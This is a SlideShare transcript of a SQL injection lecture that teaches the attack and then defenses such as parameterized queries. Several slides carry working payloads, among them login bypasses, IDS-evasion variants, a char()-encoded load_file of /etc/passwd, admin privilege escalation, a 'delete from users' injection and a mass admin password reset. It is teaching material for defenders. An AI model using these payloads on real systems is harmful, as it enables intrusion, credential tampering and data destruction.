SlideShare ist ein Scribd-Unternehmen logo

Sq linjection

Mahesh Gupta (DBATAG) - SQL Server Consultant
Mahesh Gupta (DBATAG) - SQL Server Consultant
BildungTechnologie
1 von 24
Downloaden Sie, um offline zu lesen
1 1 SQL Injection The ability to inject SQL commands into the database engine through an existing application 2 What is SQL? SQL stands for Structured Query Language Allows us to access a database ANSI and ISO standard computer language The most current standard is SQL99 SQL can: execute queries against a database retrieve data from a database insert new records in a database delete records from a database update records in a database
2 3 SQL is a Standard - but... There are many different versions of the SQL language They support the same major keywords in a similar manner (such as SELECT, UPDATE, DELETE, INSERT, WHERE, and others). Most of the SQL database programs also have their own proprietary extensions in addition to the SQL standard! 4 SQL Database Tables A relational database contains one or more tables identified each by a name Tables contain records (rows) with data For example, the following table is called "users" and contains data distributed in rows and columns: dthompsondthompsonThompsonDaniel3 qwertyadamtTaylorAdam2 hellojsmithSmithJohn1 PasswordLoginLastNameNameuserID
3 5 SQL Queries With SQL, we can query a database and have a result set returned Using the previous table, a query like this: SELECT LastName FROM users WHERE UserID = 1; Gives a result set like this: LastName -------------- Smith 6 Data Manipulation Language (DML) SQL includes a syntax to update, insert, and delete records: SELECT - extracts data UPDATE - updates data INSERT INTO - inserts new data DELETE - deletes data
4 7 Data Definition Language (DDL) The Data Definition Language (DDL) part of SQL permits: Database tables to be created or deleted Define indexes (keys) Specify links between tables Impose constraints between database tables Some of the most commonly used DDL statements in SQL are: CREATE TABLE - creates a new database table ALTER TABLE - alters (changes) a database table DROP TABLE - deletes a database table 8 Metadata Almost all SQL databases are based on the RDBM (Relational Database Model) One important fact for SQL Injection Amongst Codd's 12 rules for a Truly Relational Database System: 4. Metadata (data about the database) must be stored in the database just as regular data is Therefore, database structure can also be read and altered with SQL queries
5 9 How common is SQL injection? It is probably the most common Website vulnerability today It is a flaw in "web application" development, it is not a Database or web server problem Most programmers are still not aware of this problem Many tutorials and demo “templates” are vulnerable Even worse, a lot of solutions posted on the Internet are not good enough 10 Vulnerable Applications Almost all SQL databases and programming languages are potentially vulnerable MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc Accessed through applications developed using: Perl and CGI scripts that access databases ASP, JSP, PHP XML, XSL and XSQL Javascript VB, MFC, and other ODBC-based tools and APIs DB specific Web-based applications and API’s Reports and DB Applications 3 and 4GL-based languages (C, OCI, Pro*C, and COBOL) many more
6 11 How does SQL Injection work? Common vulnerable login query SELECT * FROM users WHERE login = 'victor' AND password = '123' (If it returns something then login!) ASP/MS SQL Server login syntax var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'"; 12 Injecting through Strings formusr = ' or 1=1 – – formpwd = anything Final query would look like this: SELECT * FROM users WHERE username = ' ' or 1=1 – – AND password = 'anything'
7 13 The power of ' It closes the string parameter Everything after is considered part of the SQL command Misleading Internet suggestions include: Escape it : replace ' with '' String fields are very common but there are other types of fields: Numeric Dates 14 If it were numeric? SELECT * FROM clients WHERE account = 12345678 AND pin = 1111 PHP/MySQL login syntax $sql = "SELECT * FROM clients WHERE " . "account = $formacct AND " . "pin = $formpin";
8 15 Injecting Numeric Fields $formacct = 1 or 1=1 # $formpin = 1111 Final query would look like this: SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111 16 Evasion Techniques Input validation circumvention and IDS Evasion techniques are very similar Snort based detection of SQL Injection is partially possible but relies on "signatures" Signatures can be evaded easily Input validation, IDS detection AND strong database and OS hardening must be used together
9 17 IDS Signature Evasion Evading ' OR 1=1 signature ' OR 'unusual' = 'unusual' ' OR 'something' = 'some'+'thing' ' OR 'text' = N'text' ' OR 'something' like 'some%' ' OR 2 > 1 ' OR 'text' > 't' ' OR 'whatever' IN ('whatever') ' OR 2 BETWEEN 1 AND 3 18 SQL Injection Characters ' or " character String Indicators -- or # single-line comment /*…*/ multiple-line comment + addition, concatenate (or space in url) || (double pipe) concatenate % wildcard attribute indicator ?Param1=foo&Param2=bar URL Parameters PRINT useful as non transactional command @variable local variable @@variable global variable waitfor delay '0:0:10' time delay
10 19 Input validation Some people use PHP addslashes() function to escape characters single quote (') double quote (") backslash () NUL (the NULL byte) This can be easily evaded by using replacements for any of the previous characters in a numeric field 20 Evasion and Circumvention IDS and input validation can be circumvented by encoding Some ways of encoding parameters URL encoding Unicode/UTF-8 Hex enconding char() function
11 21 MySQL Input Validation Circumvention using Char() Inject without quotes (string = "%"): ' or username like char(37); Inject without quotes (string = "root"): ' union select * from users where login = char(114,111,111,116); Load files in unions (string = "/etc/passwd"): ' union select 1, (load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; Check for existing files (string = "n.ext"): ' and 1=( if( (load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); 22 IDS Signature Evasion using white spaces UNION SELECT signature is different to UNION SELECT Tab, carriage return, linefeed or several white spaces may be used Dropping spaces might work even better 'OR'1'='1' (with no spaces) is correctly interpreted by some of the friendlier SQL databases
12 23 IDS Signature Evasion using comments Some IDS are not tricked by white spaces Using comments is the best alternative /* … */ is used in SQL99 to delimit multirow comments UNION/**/SELECT/**/ '/**/OR/**/1/**/=/**/1 This also allows to spread the injection through multiple fields USERNAME: ' or 1/* PASSWORD: */ =1 -- 24 IDS Signature Evasion using string concatenation In MySQL it is possible to separate instructions with comments UNI/**/ON SEL/**/ECT Or you can concatenate text and use a DB specific instruction to execute Oracle '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' MS SQL '; EXEC ('SEL' + 'ECT US' + 'ER')
13 25 SQL injection SQL uses single and double quotes to switch between data and code. Semi-colons separate SQL statements Example query: "UPDATE users SET prefcolor='red' WHERE uid='joe';" This command could be sent from a web front-end to a database engine. The database engine then interprets the command 26 Dynamic SQL Generation Web applications dynamically generate the necessary database commands by manipulating strings Example query generation: $q = "UPDATE users SET prefcolor='$INPUT[color]' WHERE uid='$auth_user'"; where the value of "$INPUT[color]" would be originating from the client web browser, through the web server. and where the value for "$auth_user" would have been stored on the server and verified through some authentication scheme
14 27 Client Web Browser Forms in client browsers return values to the web server through either the POST or GET methods "GET" results in a url with a "?" before the values of the form variables are specified: http://www.example.com/script?color=red The value of "$INPUT[color]" is set to "red" in the script "GET" urls are convenient to hack, but there is no significant difference in the security of either "GET" or "POST" methods because the data comes from the client web browser and is under the control of the remote attacker 28 The SQL Table Tables are used to store information in fields (columns) in relation to a key (e.g., "uid") What other fields could be of interest? CREATE TABLE users ( prefcolor varchar(20), uid VARCHAR(20) NOT NULL, privilege ENUM('normal','administrator'), PRIMARY KEY (uid) );
15 29 A Malicious SQL Query What if we could make the web server generate a query like: "UPDATE users SET prefcolor='red', privilege='administrator' WHERE uid='joe';" Can we engineer the value of "color" given to the web server so it generates this query? Note how code and data are mixed in the same channel Better database interfaces provide separate channels Java prepared statements Stored procedures 30 Malicious HTTP Request http://www.example.com/script?color =red',privilege='administrator The "color" input is then substituted to generate SQL: $q = "UPDATE users SET prefcolor='$INPUT[color]' WHERE uid='$auth_user'"; It gives the query we wanted! Joe now has administrator privileges
16 31 Adding Another SQL Query Suppose that Joe wants to run a completely different query: "DELETE FROM users" This will delete all entries in the table! How can the value of "color" be engineered? 32 Malicious HTTP Request http://www.example.com/script?color=red '%3Bdelete+from+users%3B %3B is the url encoding for ";" What happens when the "color" input is used to generate SQL? $q = "UPDATE users SET prefcolor='$INPUT[color]' WHERE uid='$auth_user'";
17 33 Result UPDATE users SET prefcolor='red'; delete from users; WHERE uid='$auth_user'"; The last line generates an error, but it is already too late; all entries have been deleted. The middle query could have been anything 34 FAQs Couldn't the database have a separate account for "Joe" with only the privileges he needs (e.g., no delete privilege)? YES, but in practice the management of such accounts and privileges, and connecting to the database with the correct IDs, adds significant complexity Most often a database account is created for the entire web application, with appropriate limitations (e.g., without privileges to create and drop tables) A good compromise is to create database accounts for each class of user or class of operation, so: if Joe is a regular user he would not have delete privileges for the user table Changing user preferences, as an operation type, does not require delete privileges
18 35 FAQs Doesn't SSL protect against this sort of attack? No But what if you authenticate users with a username/password over SSL? Then, if the user does SQL injection, the server admins will know who perpetrated the crime, right? Not necessarily; only if you have sufficient audit logging. 36 Another example of SQL Injection UPDATE usertable SET pwd='$INPUT[pwd]' WHERE uid='$INPUT[uid]'; This will modify a password stored in “usertable”
19 37 Malicious http request Coupled to database engine without cleansing: http://www.none.to/script?pwd=ngomo& uid=1'+or+uid+like'%25admin%25';--% This sets the variable pwd to ngomo & is a separator uid is set to “1' or uid like '%admin%';--%” (% are wild cards, like *) What happens when the SQL is interpreted? 38 Resulting SQL query UPDATE usertable SET pwd='ngomo' WHERE uid='1’ or uid like‘%admin%’;--%'; The passwords of all accounts with “admin” in their names have been reset to something only the attacker knows (ngomo)!
20 39 Other SQL Injection Methods Let's say you have blocked single quotes, double quotes and semi- colons. What else can go wrong? How about ""? If an attacker can inject backslashes, then escaped quotes could get ignored by the database 40 PHP-Nuke 5.6 SQL injection CAN-2002-1242 Advisory dated Oct. 31, 2002 Malicious url: modules.php?name=Your_Account&op=saveu ser&uid=2&bio=%5c&EditedMessage= no&pass=xxxxx&vpass=xxxxx&newsletter=, +pass=md5(1)/* Recognize %5c? It’s ‘’
21 41 Query becomes UPDATE nuke_users SET name = '', email = '', femail = '', url = 'http://', pass = 'xxxxx', bio = '', user_avatar = '', user_icq = '', user_msnm = '', newsletter = ', pass=md5(1)/*' WHERE uid='2' Notice how bio would be set to the text in red? Notice how the comment field, ‘/*’, is used to comment out the userid? This means that the query applies to *all* users! 42 Defense: Escape control characters UPDATE nuke_users SET name = '', email = '', femail = '', url = 'http://', pass = 'xxxxx', bio = '', user_avatar = '', user_icq = '', user_msnm = '', newsletter = ', pass=md5(1)/*' WHERE uid='2' In this case, all the attacker manages to do is to set his “newsletter” field to some strange looking string. PHP can do that automatically if configured that way.
22 43 Double whammy: SQL injection and Buffer Overflow Oracle 8i and 9i include six standard Oracle database functions BFILENAME FROM_TZ NUMTODSINTERVAL NUMTOYMINTERVAL TO_TIMESTAMP_TZ TZ_OFFSET with buffer overflow vulnerability that may allow attacker to gain root privileges (since, for example, Oracle runs under administrator account in Windows); in UNIX, only (!) the whole DB is compromised. 44 Double whammy: A legitimate use of the function SELECT FROM_TZ(TIMESTAMP ‘2006-03-22 20:00:00’, ‘7:00’) FROM DUAL returns 22-MAR-06 08:00:00 PM +7:00 What happens with SELECT FROM_TZ(TIMESTAMP ‘2006-03-22 20:00:00’, ‘aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa’) FROM DUAL
23 45 Defending against SQL injections Sanitize all input. Assume all input is harmful. Validate user input that contains dangerous keywords or SQL characters, such as “xp_cmdshell”, “- -”, and “;”. Consider using regular expressions to remove unwanted characters. This approach is safer than writing your own search and replace routines. Run with least privilege. Do not execute an SQL SELECT statement as “sa”. Create low-privilege accounts to access data. Use SQL permissions to lock down databases, stored procedures, and tables. Remove unused stored procedures. 46 Defending against SQL injections Do not allow clients to view ODBC/OLE DB error messages. Handle these errors with your own code. By default, ASP pages returns error messages to clients. Enable logging of all user access, and set alerts to log all failed attempts to access objects. Do not use string concatenations to build SQL queries. Instead, use parameterized queries or parameterized stored procedures, because they explicitly define input and output values and do not process multiple statements as a batch.
24 47 Back to a previous example var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'"; is replaced by SqlConnection objConnection=new SqlConnection(_ConnectionString); objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE login = @Name AND password = @Password", objConnection); objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PasswordTextBox.Text); SqlDataReader objReader = objCommand.ExecuteReader(); if (objReader.Read()) { ... Why is it safer? Because the SQL server knows that the value of the parameter is not actual code to execute, but data 48 Links A lot of SQL Injection related papers http://www.nextgenss.com/papers.htm http://www.spidynamics.com/support/whitepapers/ http://www.appsecinc.com/techdocs/whitepapers.html http://www.atstake.com/research/advisories Other resources http://www.owasp.org http://www.sqlsecurity.com http://www.securityfocus.com/infocus/1768

Empfohlen

SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and FallaciesKarwin Software Solutions LLC
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLPradeep Kumar
 

Empfohlen

SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and FallaciesKarwin Software Solutions LLC
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLPradeep Kumar
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv OwaspAung Khant
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicJW CyberNerd
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in PythonPublic Broadcasting Service
 
Advanced sql injection 2
Advanced sql injection 2Advanced sql injection 2
Advanced sql injection 2Karunakar Singh Thakur
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlChema Alonso
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesChema Alonso
 
PHP - Introduction to Advanced SQL
PHP - Introduction to Advanced SQLPHP - Introduction to Advanced SQL
PHP - Introduction to Advanced SQLVibrant Technologies & Computers
 
JDBC
JDBCJDBC
JDBCSunil OS
 
ORM Injection
ORM InjectionORM Injection
ORM InjectionSimone Onofri
 
CIS 336 Education guide/Tutorialrank.com
CIS 336 Education guide/Tutorialrank.comCIS 336 Education guide/Tutorialrank.com
CIS 336 Education guide/Tutorialrank.comtyjhgfsdfgh
 
Vendor session myFMbutler DoSQL 2
Vendor session myFMbutler DoSQL 2Vendor session myFMbutler DoSQL 2
Vendor session myFMbutler DoSQL 2Koen Van Hulle
 
Data Warehouse and Business Intelligence - Recipe 3
Data Warehouse and Business Intelligence - Recipe 3Data Warehouse and Business Intelligence - Recipe 3
Data Warehouse and Business Intelligence - Recipe 3Massimo Cenci
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1Bernardo Damele A. G.
 
Advanced sql injection 1
Advanced sql injection 1Advanced sql injection 1
Advanced sql injection 1Karunakar Singh Thakur
 
Recipes 8 of Data Warehouse and Business Intelligence - Naming convention tec...
Recipes 8 of Data Warehouse and Business Intelligence - Naming convention tec...Recipes 8 of Data Warehouse and Business Intelligence - Naming convention tec...
Recipes 8 of Data Warehouse and Business Intelligence - Naming convention tec...Massimo Cenci
 
Oracle notes
Oracle notesOracle notes
Oracle notesPrashant Dadmode
 
Data Warehouse and Business Intelligence - Recipe 1
Data Warehouse and Business Intelligence - Recipe 1Data Warehouse and Business Intelligence - Recipe 1
Data Warehouse and Business Intelligence - Recipe 1Massimo Cenci
 
ata Warehouse and Business Intelligence - Recipe 7 - A messaging system for O...
ata Warehouse and Business Intelligence - Recipe 7 - A messaging system for O...ata Warehouse and Business Intelligence - Recipe 7 - A messaging system for O...
ata Warehouse and Business Intelligence - Recipe 7 - A messaging system for O...Massimo Cenci
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 

Weitere ähnliche Inhalte

Was ist angesagt?

Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv OwaspAung Khant
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicJW CyberNerd
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlChema Alonso
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesChema Alonso
 
CIS 336 Education guide/Tutorialrank.com
CIS 336 Education guide/Tutorialrank.comCIS 336 Education guide/Tutorialrank.com
CIS 336 Education guide/Tutorialrank.comtyjhgfsdfgh
 
Vendor session myFMbutler DoSQL 2
Vendor session myFMbutler DoSQL 2Vendor session myFMbutler DoSQL 2
Vendor session myFMbutler DoSQL 2Koen Van Hulle
 
Data Warehouse and Business Intelligence - Recipe 3
Data Warehouse and Business Intelligence - Recipe 3Data Warehouse and Business Intelligence - Recipe 3
Data Warehouse and Business Intelligence - Recipe 3Massimo Cenci
 
Recipes 8 of Data Warehouse and Business Intelligence - Naming convention tec...
Recipes 8 of Data Warehouse and Business Intelligence - Naming convention tec...Recipes 8 of Data Warehouse and Business Intelligence - Naming convention tec...
Recipes 8 of Data Warehouse and Business Intelligence - Naming convention tec...Massimo Cenci
 
Data Warehouse and Business Intelligence - Recipe 1
Data Warehouse and Business Intelligence - Recipe 1Data Warehouse and Business Intelligence - Recipe 1
Data Warehouse and Business Intelligence - Recipe 1Massimo Cenci
 
ata Warehouse and Business Intelligence - Recipe 7 - A messaging system for O...
ata Warehouse and Business Intelligence - Recipe 7 - A messaging system for O...ata Warehouse and Business Intelligence - Recipe 7 - A messaging system for O...
ata Warehouse and Business Intelligence - Recipe 7 - A messaging system for O...Massimo Cenci
 

Was ist angesagt? (20)

Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
Advanced sql injection 2
Advanced sql injection 2Advanced sql injection 2
Advanced sql injection 2
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy Queries
 
PHP - Introduction to Advanced SQL
PHP - Introduction to Advanced SQLPHP - Introduction to Advanced SQL
PHP - Introduction to Advanced SQL
 
JDBC
JDBCJDBC
JDBC
 
ORM Injection
ORM InjectionORM Injection
ORM Injection
 
CIS 336 Education guide/Tutorialrank.com
CIS 336 Education guide/Tutorialrank.comCIS 336 Education guide/Tutorialrank.com
CIS 336 Education guide/Tutorialrank.com
 
Vendor session myFMbutler DoSQL 2
Vendor session myFMbutler DoSQL 2Vendor session myFMbutler DoSQL 2
Vendor session myFMbutler DoSQL 2
 
Data Warehouse and Business Intelligence - Recipe 3
Data Warehouse and Business Intelligence - Recipe 3Data Warehouse and Business Intelligence - Recipe 3
Data Warehouse and Business Intelligence - Recipe 3
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
Advanced sql injection 1
Advanced sql injection 1Advanced sql injection 1
Advanced sql injection 1
 
Recipes 8 of Data Warehouse and Business Intelligence - Naming convention tec...
Recipes 8 of Data Warehouse and Business Intelligence - Naming convention tec...Recipes 8 of Data Warehouse and Business Intelligence - Naming convention tec...
Recipes 8 of Data Warehouse and Business Intelligence - Naming convention tec...
 
Oracle notes
Oracle notesOracle notes
Oracle notes
 
Data Warehouse and Business Intelligence - Recipe 1
Data Warehouse and Business Intelligence - Recipe 1Data Warehouse and Business Intelligence - Recipe 1
Data Warehouse and Business Intelligence - Recipe 1
 
ata Warehouse and Business Intelligence - Recipe 7 - A messaging system for O...
ata Warehouse and Business Intelligence - Recipe 7 - A messaging system for O...ata Warehouse and Business Intelligence - Recipe 7 - A messaging system for O...
ata Warehouse and Business Intelligence - Recipe 7 - A messaging system for O...
 

Ähnlich wie Sq linjection

Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injectionnewbie2019
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sqlKaustav Sengupta
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity FrameworksRich Helton
 
Advanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming LanguagesAdvanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming LanguagesS.Shayan Daneshvar
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish fileyukta888
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
References - sql injection
References - sql injection References - sql injection
References - sql injection Mohammed
 
10 Rules for Safer Code
10 Rules for Safer Code10 Rules for Safer Code
10 Rules for Safer CodeQuang Ngoc
 

Ähnlich wie Sq linjection (20)

Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasures
 
Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sql
 
Greensql2007
Greensql2007Greensql2007
Greensql2007
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
 
Advanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming LanguagesAdvanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access from Programming Languages
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish file
 
Sql
SqlSql
Sql
 
Asp
AspAsp
Asp
 
Sql Injection V.2
Sql Injection V.2Sql Injection V.2
Sql Injection V.2
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
References
References References
References
 
References - sql injection
References - sql injection References - sql injection
References - sql injection
 
10 Rules for Safer Code
10 Rules for Safer Code10 Rules for Safer Code
10 Rules for Safer Code
 

Kürzlich hochgeladen

Active Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfActive Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfPatidar M
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management systemChristalin Nelson
 
Using Grammatical Signals Suitable to Patterns of Idea Development
Using Grammatical Signals Suitable to Patterns of Idea DevelopmentUsing Grammatical Signals Suitable to Patterns of Idea Development
Using Grammatical Signals Suitable to Patterns of Idea Developmentchesterberbo7
 
Beauty Amidst the Bytes_ Unearthing Unexpected Advantages of the Digital Wast...
Beauty Amidst the Bytes_ Unearthing Unexpected Advantages of the Digital Wast...Beauty Amidst the Bytes_ Unearthing Unexpected Advantages of the Digital Wast...
Beauty Amidst the Bytes_ Unearthing Unexpected Advantages of the Digital Wast...DhatriParmar
 
4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptxmary850239
 
Q-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITWQ-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITWQuiz Club NITW
 
DIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptx
DIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptxDIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptx
DIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptxMichelleTuguinay1
 
Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4JOYLYNSAMANIEGO
 
MS4 level being good citizen -imperative- (1) (1).pdf
MS4 level being good citizen -imperative- (1) (1).pdfMS4 level being good citizen -imperative- (1) (1).pdf
MS4 level being good citizen -imperative- (1) (1).pdfMr Bounab Samir
 
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...Nguyen Thanh Tu Collection
 
Textual Evidence in Reading and Writing of SHS
Textual Evidence in Reading and Writing of SHSTextual Evidence in Reading and Writing of SHS
Textual Evidence in Reading and Writing of SHSMae Pangan
 
How to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 DatabaseHow to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 DatabaseCeline George
 
Scientific Writing :Research Discourse
Scientific Writing :Research DiscourseScientific Writing :Research Discourse
Scientific Writing :Research DiscourseAnita GoswamiGiri
 
Multi Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP ModuleMulti Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP ModuleCeline George
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
